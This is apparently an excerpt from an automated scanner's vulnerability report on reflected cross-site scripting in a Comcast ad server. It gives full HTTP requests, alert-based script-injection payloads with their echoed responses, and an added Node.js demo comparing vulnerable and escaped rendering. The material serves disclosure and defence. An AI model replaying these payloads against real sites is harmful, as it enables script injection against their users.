GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net14935"%3be7e5252438c/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1395
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net14935";e7e5252438c/network/202236386/L17/1951116135/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="
...[SNIP]...

2.110. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d17"><script>alert(1)</script>cff26d6cff1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1445
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1983654328/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.111. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171b6"%3b637bcacedc8 was submitted in the REST URL parameter 5. This input was echoed as 171b6";637bcacedc8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network171b6"%3b637bcacedc8/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1395
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network171b6";637bcacedc8/202236386/L17/1178633365/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFla
...[SNIP]...

2.112. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e77"><script>alert(1)</script>bef770f05c3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1443
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/964926435/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.113. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e88e"-alert(1)-"53982542345 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1413
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/196666583/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK
...[SNIP]...
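
The two reflection contexts this section keeps distinguishing, a double-quoted HTML attribute (issues 2.104 to 2.108, 2.110, 2.112 and 2.114) and a double-quoted JavaScript string (2.109, 2.111, 2.113 and 2.115), can be reproduced offline. The Node.js script below is an added example, not OAS or Comcast code. It models the adstream_lx.ads response with constructed approximations of the IMG SRC and TFSMFlash_OASCLICK lines, injects the report's own probes at the report's parameter positions, checks for an unmodified echo the way the scanner does, runs the reflected script with alert() stubbed to show why the string terminator of 2.109 earns only Firm confidence while the "-alert(1)-" payload of 2.113 executes, and renders the same path through a hardened builder (per-segment allow-list, percent-encoding, then attribute or JavaScript-literal escaping). The allow-list alphabet is an assumption drawn from the paths in this report, not an OAS rule.

```javascript
'use strict';
// Added example for this report, not OAS or Comcast code. Models how the
// adstream_lx.ads responses reflect URL path segments into two contexts,
// a double-quoted HTML attribute (the IMG SRC) and a double-quoted JavaScript
// string (TFSMFlash_OASCLICK). The template strings approximate the responses
// shown above; the allow-list alphabet below is an assumption, not an OAS rule.

const HOST = 'http://oascentral.comcast.net';

// Constructed sample: the segments of the path in issue 2.113. The report's
// "REST URL parameter N" counts "RealMedia" as parameter 1, so
// "yahoo.comcast.net" is parameter 4 and "202236386" is parameter 6.
const SEGMENTS = [
  'RealMedia', 'ads', 'adstream_lx.ads', 'yahoo.comcast.net', 'network',
  '202236386', 'L17', '1621451620', 'x32', 'Comcast',
  'MostynLaw_201012_SIG_300_HOU_B', '300x250_FLA_Mostyn_07022010.html',
  '726e6e65456b7a75345934414371526a',
];

// Probes copied from the report, applied to the sample path at the same
// parameter positions. The hex on each side lets the tester locate the echo
// and confirm the middle came back unchanged.
const PROBES = {
  attr:      { param: 6, probe: 'f1313"><script>alert(1)</script>84290a6437b' },             // 2.104
  attrEvent: { param: 9, probe: 'aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf' }, // 2.106
  jsBreak:   { param: 4, probe: '14935"%3be7e5252438c' },                                    // 2.109
  jsExec:    { param: 6, probe: '7e88e"-alert(1)-"53982542345' },                            // 2.113
};

// Appends a probe to the 1-based parameter, exactly as the report's requests do.
function inject(segments, param, probe) {
  const out = segments.slice();
  out[param - 1] += probe;
  return out;
}

// Vulnerable renderer: percent-decodes each segment (the report shows %3b
// coming back as ";") and concatenates it raw into both contexts.
function renderVulnerable(segments) {
  const path = segments.map((s) => decodeURIComponent(s)).join('/');
  return {
    img: `<IMG SRC="${HOST}/${path}?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>`,
    js: `var TFSMFlash_OASCLICK="${HOST}/${path};zip=US:77002";\n` +
        'var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK;',
  };
}

// Hardened renderer. With strict=true each decoded segment must match the
// alphabet the ad paths in this report use; either way the segment is
// re-encoded for the URL and the result is escaped for the context it lands in.
const SEGMENT_RE = /^[A-Za-z0-9._-]{1,128}$/;

function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function jsString(s) {
  // JSON escaping covers " and \; "<" is escaped as well so "</script>" can
  // never appear inside an inline script block.
  return JSON.stringify(s).replace(/</g, '\\u003c');
}

function renderHardened(segments, strict = true) {
  const path = segments.map((s) => {
    const d = decodeURIComponent(s);
    if (strict && !SEGMENT_RE.test(d)) throw new Error('rejected path segment: ' + d);
    return encodeURIComponent(d);
  }).join('/');
  const src = `${HOST}/${path}?_RM_EMPTY_&`;
  const click = `${HOST}/${path};zip=US:77002`;
  return {
    img: `<IMG SRC="${escapeAttr(src)}" WIDTH=2 HEIGHT=2>`,
    js: `var TFSMFlash_OASCLICK=${jsString(click)};`,
  };
}

// The scanner's check: did the decoded probe come back byte for byte?
function echoedUnmodified(body, probe) {
  return body.includes(decodeURIComponent(probe));
}

// Runs the reflected script with alert() stubbed. A probe that only
// terminates the string leaves the rest of the path as invalid JavaScript
// (the token 300x250 cannot follow a numeric literal), so nothing runs;
// "-alert(1)-" keeps the literal inside a valid subtraction and alert() fires.
function runScript(js) {
  const alerts = [];
  try {
    new Function('alert', js)((v) => { alerts.push(v); });
    return { parsed: true, alerts };
  } catch (e) {
    return { parsed: !(e instanceof SyntaxError), alerts, error: e.name };
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, { param, probe }] of Object.entries(PROBES)) {
    const v = renderVulnerable(inject(SEGMENTS, param, probe));
    console.log(name, 'echoed in IMG:', echoedUnmodified(v.img, probe),
                'script:', JSON.stringify(runScript(v.js)));
  }
}
```

Run it with node and compare the four lines against the report: every probe is echoed into the IMG SRC, jsBreak leaves a SyntaxError behind, and only jsExec produces an alert. The hardened builder rejects all four probes in strict mode, and with the allow-list switched off the encoding alone still keeps them out of both contexts.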

2.114. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a574f"><script>alert(1)</script>34133688c6e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1447
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/L/856912946/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.115. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5a9a"-alert(1)-"e60a8a7472b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1419
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/L/2133113156/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK
...[SNIP]...

2.116. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d61ce"-alert(1)-"5ab7386432 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1440
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17/1279528946/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TFSMFlash_
...[SNIP]...

